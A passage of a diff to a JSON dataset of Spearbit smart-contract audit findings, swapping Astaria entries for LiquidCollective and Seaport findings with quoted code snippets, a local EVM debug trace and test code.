they can call liquidatorNFTClaim to claim the NFT. Or if the Seaport auction settles, the liquidator receives the liquidation fee.", + "title": "Consider renaming transferOwnership to better reflect the function's logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The current implementation of transferOwnership is not really transferring the ownership from the current admin to the new one. The function is setting the value of the Pending Admin that must subsequently call acceptOwnership to accept the role and confirm the transfer of the ownership.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Until ASTARIA_ROUTER gets filed for CollateralToken, CollateralToken can not receive ERC721s safely.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "ASTARIA_ROUTER is not set in the CollateralToken's constructor. So till an entity with an author- ity would file for it, CollateralToken is unable to safely receive an ERC721 token ( whenNotPaused and on- ERC721Received would revert).", + "title": "Wrong return name used", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The min function returns the minimum of the 2 inputs, but the return name used is max.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "_getMaxPotentialDebtForCollateral might have meant to be an internal function", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "_getMaxPotentialDebtForCollateral is defined as a public function. underscore which as a convention usually is used for internal or private functions.", + "title": "Discrepancy between architecture and code", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The architecture diagram states that admin triggers deposits on the Consensus Layer Deposit Man- ager, but the depositToConsensusLayer() function allows anyone to trigger such deposits.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "return keyword can be removed from stopLiens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "_stopLiens does not return any values but in stopLiens the return statement is used along with the non-existent return value of _stopLiens.", + "title": "Consider replacing the remaining require with custom errors", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "In the vast majority of the project contracts have defined and already use Custom Errors that provide a better UX, DX and gas saving compared to require statements. There are still some instances of require usage in ConsensusLayerDepositManager and BytesLib contracts that could be replaced with custom errors.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "LienToken's constructor does not set ASTARIA_ROUTER which makes some of the endpoints unfunc- tional", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "LienToken's constructor does not set ASTARIA_ROUTER. That means till an authorized entity calls file to set this parameter, the following functions would be broken/revert: buyoutLien _buyoutLien _payDebt getBuyout _getBuyout _isPublicVault setPayee, partially broken _paymentAH payDebtViaClearingHouse", + "title": "Both wlsETH and lsETH transferFrom implementation allow the owner of the token to use trans- ferFrom like if it was a \"normal\" transfer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The current implementation of transferFrom allow the msg.sender to use the function like if it was a \"normal\" transfer. In this case, the allowance is checked only if the msg.sender is not equal to _from if (_from != msg.sender) { uint256 currentAllowance = ApprovalsPerOwner.get(_from, msg.sender); if (currentAllowance < _value) { revert AllowanceTooLow(_from, msg.sender, currentAllowance, _value); } ApprovalsPerOwner.set(_from, msg.sender, currentAllowance - _value); } This implementation diverge from what is usually implemented in both Solmate and OpenZeppelin.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Document the approval process for a user's CollateralToken before calling commitToLiens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In the _executeCommitment's return statement: IVaultImplementation(c.lienRequest.strategy.vault).commitToLien( c, address(this) ); address(this) is the AstariaRouter. The call here to commitToLien enters into _validateCommitment with AstariaRouter as the receiver and so for it to no revert, the holder would have needed to set the approval for the router previously/beforehand: CT.isApprovedForAll(holder, receiver) // needs to be true 83", + "title": "Both wlsETH and lsETH tokens are reducing the allowance when the allowed amount is type(uint256).max", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The current implementation of the function transferFrom in both SharesManager.1.sol and WLSETH.1.sol is not taking into consideration the scenario where a user has approved a spender the maximum possible allowance type(uint256).max. The Alluvial transferFrom acts differently from standard ERC20 implementations like the one from Solmate and OpenZeppelin. In their implementation, they check and reduce the spender allowance if and only if the allowance is different from type(uint256).max.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "isValidRefinance's return statement can be reformatted", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Currently, it is a bit hard to read the return statement of isValidRefinance.", + "title": "Missing, confusing or wrong natspec comments", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "In the current implementation not all the constructors, functions, events, custom errors, variables or struct are covered by natspec comments. Some of them are only partially covered (missing @param, @return and so on). Note that the contracts listed in the context section of the issue have inside of them complete or partial missing natspec. Natspec Fixes / Typos: River.1.sol#L38-L39 Swap the empty line with the NatSpec @notice - /// @notice Prevents unauthorized calls - + + /// @notice Prevents unauthorized calls OperatorsRegistry.1.sol#L44, OperatorsRegistry.1.sol#L61, OperatorsRegistry.1.sol#L114 Replace name with index. - /// @param _index The name identifying the operator + /// @param _index The index identifying the operator OperatorsRegistry.1.sol#L218 Replace cound with count. - /// @notice Changes the operator stopped validator cound + /// @notice Changes the operator stopped validator count Expand the natspec explanation: We also suggest expanding some function's logic inside the natspec OperatorsRegistry.1.sol#L355-L358 Expand the natspec documentation and add a @return natspec comment clarifying that the returned value is the number of total operator and not the active/fundable one. ReportsVariants.sol#L5 Add a comment that explains the COUNT_OUTMASK's assignment. This will mask beaconValidators and beacon- Balance in the designed packing. xx...xx xxxx & COUNT_OUTMASK == 00...00 0000 ReportsVariants.sol ReportsVariants should have a documentation regarding the packing used for ReportsVariants in an uint256: [ 0, 16) : oracle member's total vote count for the numbers below (uint16, 2 bytes) ,! [16, [48, 112) : 48) : total number of beacon validators (uint32, 4 bytes) total balance of all the beacon validators (uint64, 6 bytes) OracleMembers.sol Leave a comment/warning that only there could a maximum of 256 oracle members. This is due to the Report- sPosition setup where in an uint256, 1 bit is reserved for each oracle member's index. ReportsPositions.sol 63 Leave a comment/warning for the ReportsPosition setup that the ith bit in the uint256 represents whether or not there has been a beacon report by the ith oracle member. Oracle.1.sol#L202-L205 Leave a comment/warning that only there could a maximum of 256 oracle members. This is due to the Report- sPosition setup where in an uint256, 1 bit is reserved for each oracle member's index. Allowlist.1.sol#L46-L49 Leave a comment, warning that the permission bitmaps will be overwritten instead of them getting updated. OracleManager.1.sol#L44 Add more comment for _roundId to mention that when the setBeaconData is called by Oracle.1.sol:_push- ToRiver and that the value passed to it for this parameter is always the 1st epoch of a frame. OperatorsRegistry.1.sol#L304-L310 _indexes parameter, mentioning that this array: 1) needs to be duplicate-free and sorted (DESC) 2) each element in the array needs to be in a specific range, namely operator.[funded, keys). OperatorsRegistry.1.sol#L60-L62 Better rephrase the natspec comment to avoid further confusion. Oracle.1.sol#L284-L289 Update the reportBeacon natspec documentation about the _beaconValidators parameter to avoid further con- fusion. Client answer to the PR comment The docs should be updated to also reflect our plans for the Shanghai fork. Basically we can't just have the same behavior for a negative delta in validator count than with a positive delta (where we just assume that each validator that was in the queue only had 32 eth). Now when we exit validator we need to know how much was exited in order to compute the proper revenue value for the treasury and operator fee. This probably means that there will be an extra arg with the oracle to keep track of the exited eth value. But as long as the spec is not final, we'll stick to the validator count always growing. We should definitely add a custom error to explain that in case a report provides a smaller validator count.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Withdraw Reserves should always be transferred before Commit to Lien", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When a new lien is requested, the _beforeCommitToLien() function is called. If the epoch is over, this calls processEpoch(). Otherwise, it calls transferWithdrawReserve(). function _beforeCommitToLien( IAstariaRouter.Commitment calldata params, address receiver ) internal virtual override(VaultImplementation) { VaultData storage s = _loadStorageSlot(); if (timeToEpochEnd() == uint256(0)) { processEpoch(); } else if (s.withdrawReserve > uint256(0)) { transferWithdrawReserve(); } } However, the processEpoch() function will fail if the withdraw reserves haven't been transferred. In this case, it would require the user to manually call transferWithdrawReserve() to fix things, and then request their lien again. Instead, the protocol should transfer the reserves whenever it is needed, and only then call processEpoch().", + "title": "Remove unused imports from code", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The codebase has unused imports across the code base. If they are not used inside the contract, it would be better to remove them to avoid confusion.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Remove owner() variable from withdraw proxies", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When a withdrawProxy is deployed, it is created with certain immutable arguments. Two of these values are owner() and vault(), and they will always be equal. They seem to be used interchangeably on the withdraw proxy itself, so should be consolidated into one variable.", + "title": "Missing event emission in critical functions, init functions and setters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Some critical functions like contract's constructor, contract's init*(...)function (upgradable con- tracts) and some setter or in general critical functions are missing event emission. Event emissions are very useful for external web3 applications, but also for monitoring the usage and security of your protocol when paired with external monitoring tools. Note: in the init*(...)/constructor function, consider if adding a general broad event like ContractInitial- ized or split it in more specific events like QuorumUpdated+OwnerChanged+... 65 Note: in general, consider adding an event emission to all the init*(...) functions used to initialize the upgrad- able contracts, passing to the event the relevant args in addition to the version of the upgrade.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Unnecessary checks in _validateCommitment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In _validateCommitment(), we check to confirm that either the sender of the message is adequately qualified to be making the decision to take a lien against the collateral (ie they are the holder, the operator, etc). However, the way this is checked is somewhat roundabout and can be substantially simplified. For example, we check require(operator == receiver); in a block that is only triggered if we've already validated that receiver != operator.", + "title": "The spent offer amounts provided to OrderFulfilled for collection of (advanced) orders is not the actual amount spent in general", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "When Seaport is called to fulfill or match a collection of (advanced) orders, the OrderFulfilled is called before applying fulfillments and executing transfers. The offer and consideration items have the following forms: C = (It , T , i, acurr , R, acurr ) O = (It , T , i, acurr , acurr ) Where parameter description It T i acurr R O C itemType token identifier the interpolation of startAmount and endAmount depending on the time and the fraction of the order. consideration item's recipient offer item. consideration item. The SpentItems and ReceivedItem items provided to OrderFulfilled event ignore the last component of the offer/consideration items in the above form since they are redundant. Seaport enforces that all consideration items are used. But for the endpoints in this context, we might end up with offer items with only a portion of their amounts being spent. So in the end O.acurr might not be the amount spent for this offer item, but OrderFulfilled emits O.acurr as the amount spent. This can cause discrepancies in off-chain bookkeeping by agents listening for this event. The fulfillOrder and fulfillAdvancedOrder do not have this issue, since all items are enforced to be used. These two endpoints also differ from when there are collections of (advanced) orders, in that they would emit the OrderFulfilled at the of their call before clearing the reentrancy guard.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Medium Risk" ] }, { - "title": "Comment or remove unused function parameters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Highlighted functions above take arguments which are never used. particular signature, comment that argument name, otherwise remove that argument completely. If the function has to have a Additional instances noted in Context above. LienToken.sol#L726 : LienStorage storage s input parameter is not used in _getRemainingInterest. It can be removed and this function can be pure. VaultImplementation.sol#L341 : incoming is not used buyoutLien, was this variable meant to be used?", + "title": "The spent offer item amounts shared with a zone for restricted (advanced) orders or with a contract offerer for orders of CONTRACT order type is not the actual spent amount in general", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "When Seaport is called to fulfill or match a collection of (advanced) orders, there are scenarios where not all offer items will be used. When not all the current amount of an offer item is used and if this offer item belongs to an order which is of either CONTRACT order type or it is restricted order (and the caller is not the zone), then the spent amount shared with either the contract offerer or zone through their respective endpoints (validateOrder for zones and ratifyOrder for contract offerers) does not reflect the actual amount spent. When Seaport is called through one of its more complex endpoints to match or fulfill orders, the offer items go through a few phases: parameter description It T i as ae acurr O itemType token identifier startAmount endAmount the interpolation of startAmount and endAmount depending on the time and the fraction of the order. offer item. Let's assume an offer item is originally O = (It , T , i, as, ae) In _validateOrdersAndPrepareToFulfill, O gets transformed into (It , T , i, acurr , acurr ) Then depending on whether the order is part of a match (1, 2. 3) or fulfillment (1, 2) order and there is a corresponding fulfillment data pointing at this offer item, it might transform into (It , T , i, b, acurr ) where b 2 [0, 1). For fulfilling a collection of orders b 2 {0, acurr } depending on whether the offer item gets used or not, but for match orders, it can be in the more general range of b 2 [0, 1). And finally for restricted or CONTRACT order types before calling _assertRestrictedAdvancedOrderValidity, the offer item would be transformed into (It , T , i, acurr , acurr ). So the startAmount of an offer item goes through the following flow: as ! acurr ! b 2 [0, 1) ! acurr 7 And at the end acurr is the amount used when Seaport calls into the validateOrder of a zone or ratifyOrder of a contract offerer. acurr does not reflect the actual amount that this offer item has contributed to a combined amount used for an execution transfer.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Medium Risk" ] }, { - "title": "Zero address check can never fail", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The details.borrower != address(0) check will never be false in the current system as AstariaRouter.sol#L352-L354 will revert when ownerOf is address(0).", + "title": "Empty criteriaResolvers for criteria-based contract orders", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "There is a deviation in how criteria-based items are resolved for contract orders. For contract orders which have offers with criteria, the _compareItems function checks that the contract offerer returned a corresponding non-criteria based itemType when identifierOrCriteria for the original item is 0, i.e., offering from an entire collection. Afterwards, the orderParameters.offer array is replaced by the offer array returned by the contract offerer. For other criteria-based orders such as offers with identifierOrCriteria = 0, the itemType of the order is only updated during the criteria resolution step. This means that for such offers there should be a corresponding CriteriaResolver struct. See the following test: 8 modified @@ -3568,9 +3568,8 @@ describe(`Advanced orders (Seaport v${VERSION})`, function () { test/advanced.spec.ts // Seller approves marketplace contract to transfer NFTs await set1155ApprovalForAll(seller, marketplaceContract.address, true); - - + const { root, proofs } = merkleTree([nftId]); const offer = [getTestItem1155WithCriteria(root, toBN(1), toBN(1))]; const offer = [getTestItem1155WithCriteria(toBN(0), toBN(1), toBN(1))]; const consideration = [ getItemETH(parseEther(\"10\"), parseEther(\"10\"), seller.address), @@ -3578,8 +3577,9 @@ describe(`Advanced orders (Seaport v${VERSION})`, function () { getItemETH(parseEther(\"1\"), parseEther(\"1\"), owner.address), ]; + - + // Replacing by `const criteriaResolvers = []` will revert const criteriaResolvers = [ buildResolver(0, 0, 0, nftId, proofs[nftId.toString()]), buildResolver(0, 0, 0, nftId, []), ]; const { order, orderHash, value } = await createOrder( However, in case of contract offers with identifierOrCriteria = 0, Seaport 1.2 does not expect a corresponding CriteriaResolver struct and will revert if one is provided as the itemType was updated to be the corresponding non-criteria based itemType. See advanced.spec.ts#L510 for a test case. Note: this also means that the fulfiller cannot explicitly provide the identifier when a contract order is being fulfilled. A malicious contract may use this to their advantage. For example, assume that a contract offerer in Seaport only accepts criteria-based offers. The fulfiller may first call previewOrder where the criteria is always resolved to a rare NFT, but the actual execution would return an uninteresting NFT. If such offers also required a corresponding resolver (similar behaviour as regular criteria based orders), then this could be fixed by explicitly providing the identifier--akin to a slippage check. In short, for regular criteria-based orders with identifierOrCriteria = 0 the fulfiller can pick which identifier to receive by providing a CriteriaResolver (as long as it's valid). For contract orders, fulfillers don't have this option and contracts may be able to abuse this.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Medium Risk" ] }, { - "title": "UX differs between Router.commitToLiens and VaultImplementation.commitToLien", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The Router function creates the Collateralized Token while the VaultImplementation requires the collateral owner to ERC721.safeTransferFrom to the CollateralToken contract prior to calling.", + "title": "Advance orders of CONTRACT order types can generate orders with less consideration items that would break the aggregation routine", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "When Seaport gets a collection of advanced orders to fulfill or match, if one of the orders has a CON- TRACT order type, Seaport calls the generateOrder(...) endpoint of that order's offerer. generateOrder(...) can provide fewer consideration items for this order. So the total number of consideration items might be less than the ones provided by the caller. But since the caller would need to provide the fulfillment data beforehand to Seaport, they might use indices that would turn to be out of range for the consideration in question after the modification applied for the contract offerer above. If this happens, the whole call will be reverted. This issue is in the same category as Advance orders of CONTRACT order types can generate orders with different consideration recipients that would break the aggregation routine.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Medium Risk" ] }, { - "title": "Document what vaults are listed by Astaria", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Anyone can call newPublicVault with epochLength in the correct range to create a public vault.", + "title": "AdvancedOrder.numerator and AdvancedOrder.denominator are unchecked for orders of CONTRACT or- der type", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "For most advanced order types, we have the following check: // Read numerator and denominator from memory and place on the stack. uint256 numerator = uint256(advancedOrder.numerator); uint256 denominator = uint256(advancedOrder.denominator); // Ensure that the supplied numerator and denominator are valid. if (numerator > denominator || numerator == 0) { _revertBadFraction(); } For CONTRACT order types this check is skipped. For later calculations (calculating the current amount) Seaport uses the numerator and denominator returned by _getGeneratedOrder which as a pair it's either (1, 1) or (0, 0). advancedOrder.numerator is only used to skip certain operations in some loops when it is 0: Skip applying criteria resolvers. 10 Skip aggregating the amount for executions. Skip the final validity check. Skipping the above operations would make sense. But when for an advancedOrder with CONTRACT order type _get- GeneratedOrder returns (h, 1, 1) and advancedOrder.numerator == 0, we would skip applying criteria resolvers, aggregating the amounts from offer or consideration amounts for this order and skip the final validity check that would call into the ratifyOrder endpoint of the offerer. But emiting the following OrderFulfilled will not be skipped, even though this advancedOrder will not be used. // Emit an OrderFulfilled event. _emitOrderFulfilledEvent( orderHash, orderParameters.offerer, orderParameters.zone, recipient, orderParameters.offer, orderParameters.consideration ); This can create discrepancies between what happens on chain and what off-chain agents index/record.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "Seaport", + "Severity: Medium Risk" ] }, { - "title": "Simplify nested if/else blocks in for loops", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "There are quite a few instances that nested if/else blocks are used in for loops and that is the only block in the for loop. 87 for ( ... ) { if () { ... } if else () { ... } ... if else () { ... } else { revert CustomError(); } }", + "title": "Calls to PausableZone's executeMatchAdvancedOrders and executeMatchOrders would revert if un- used native tokens would need to be returned", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In match (advanced) orders, one can provide native tokens as offer and consideration items. So a PausableZone would need to provide msg.value to call the corresponding Seaport endpoints. There are a few scenarios where not all the msg.value native tokens amount provided to the Seaport marketplace will be used: 1. Rounding errors in calculating the current amount of offer or consideration items. The zone can prevent send- ing extra native tokens to Seaport by pre-calculating these values and making sure to have its transaction to be included in the specific block that these values were calculated for (this is important when the start and end amount of an item are not equal). 2. The zone (un)intentionally sends more native tokens that it is necessary to Seaport. 3. The (advanced) orders sent for matching in Seaport include order type of CONTRACT offerer order and the of- ferer contract provides different amount for at least one item that would eventually make the whole transaction not use the full amount of msg.value provided to it. In all these cases, since PausableZone does not have a receive or fallback endpoint to accept native tokens, when Seaport tries to send back the unsued native token amount the transaction may revert. PausableZone not accepting native tokens: $ export CODE=$(jq -r '.deployedBytecode' artifacts/contracts/zones/PausableZone.sol/PausableZone.json | tr -d '\\n') ,! $ evm --code $CODE --value 1 --prestate genesis.json --sender ,! 0xb4d0000000000000000000000000000000000000 --nomemory=false --debug run $ evm --input $(echo $CODE | head -c 44 - | sed -E s/0x//) disasm 6080806040526004908136101561001557600080fd 00000: PUSH1 0x80 00002: DUP1 00003: PUSH1 0x40 00005: MSTORE 00006: PUSH1 0x04 00008: SWAP1 00009: DUP2 0000a: CALLDATASIZE 0000b: LT 0000c: ISZERO 0000d: PUSH2 0x0015 00010: JUMPI 00011: PUSH1 0x00 00013: DUP1 00014: REVERT trace of evm ... --debug run error: execution reverted #### TRACE #### PUSH1 pc=00000000 gas=4700000 cost=3 DUP1 pc=00000002 gas=4699997 cost=3 12 Stack: 00000000 0x80 PUSH1 Stack: 00000000 00000001 MSTORE Stack: 00000000 00000001 00000002 PUSH1 Stack: 00000000 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 SWAP1 Stack: 00000000 00000001 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 DUP2 Stack: 00000000 00000001 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 pc=00000003 gas=4699994 cost=3 pc=00000005 gas=4699991 cost=12 pc=00000006 gas=4699979 cost=3 0x80 0x80 0x40 0x80 0x80 0x80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000008 gas=4699976 cost=3 0x4 0x80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000009 gas=4699973 cost=3 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000010 gas=4699970 cost=2 0x4 0x80 0x4 CALLDATASIZE Stack: 00000000 00000001 00000002 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| 13 LT Stack: 00000000 00000001 00000002 00000003 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 ISZERO Stack: 00000000 00000001 00000002 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 PUSH2 Stack: 00000000 00000001 00000002 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 JUMPI Stack: 00000000 00000001 00000002 00000003 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 PUSH1 Stack: 00000000 00000001 Memory: 00000000 00000010 00000020 pc=00000011 gas=4699968 cost=3 0x0 0x4 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000012 gas=4699965 cost=3 0x1 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000013 gas=4699962 cost=3 0x0 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000016 gas=4699959 cost=10 0x15 0x0 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000017 gas=4699949 cost=3 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 14 00000030 00000040 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| DUP1 Stack: 00000000 00000001 00000002 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 REVERT Stack: 00000000 00000001 00000002 00000003 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 pc=00000019 gas=4699946 cost=3 0x0 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000020 gas=4699943 cost=0 0x0 0x0 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| #### LOGS #### genesis.json: { \"gasLimit\": \"4700000\", \"difficulty\": \"1\", \"alloc\": { \"0xb4d0000000000000000000000000000000000000\": { \"balance\": \"10000000000000000000000000\", \"code\": \"\", \"storage\": {} } } } // file: test/zone.spec.ts ... it(\"Fulfills an order with executeMatchAdvancedOrders with NATIVE Consideration Item\", async () => { const pausableZoneControllerFactory = await ethers.getContractFactory( \"PausableZoneController\", owner ); const pausableZoneController = await pausableZoneControllerFactory.deploy( owner.address ); // Deploy pausable zone const zoneAddr = await createZone(pausableZoneController); 15 // Mint NFTs for use in orders const nftId = await mintAndApprove721(seller, marketplaceContract.address); // Define orders const offerOne = [ getTestItem721(nftId, toBN(1), toBN(1), undefined, testERC721.address), ]; const considerationOne = [ getOfferOrConsiderationItem( 0, ethers.constants.AddressZero, toBN(0), parseEther(\"0.01\"), parseEther(\"0.01\"), seller.address ), ]; const { order: orderOne, orderHash: orderHashOne } = await createOrder( seller, zoneAddr, offerOne, considerationOne, 2 ); const offerTwo = [ getOfferOrConsiderationItem( 0, ethers.constants.AddressZero, toBN(0), parseEther(\"0.01\"), parseEther(\"0.01\"), undefined ), ]; const considerationTwo = [ getTestItem721( nftId, toBN(1), toBN(1), buyer.address, testERC721.address ), ]; const { order: orderTwo, orderHash: orderHashTwo } = await createOrder( buyer, zoneAddr, offerTwo, considerationTwo, 2 ); const fulfillments = [ [[[0, 0]], [[1, 0]]], [[[1, 0]], [[0, 0]]], ].map(([offerArr, considerationArr]) => toFulfillment(offerArr, considerationArr) ); // Perform the match advanced orders with zone const tx = await pausableZoneController 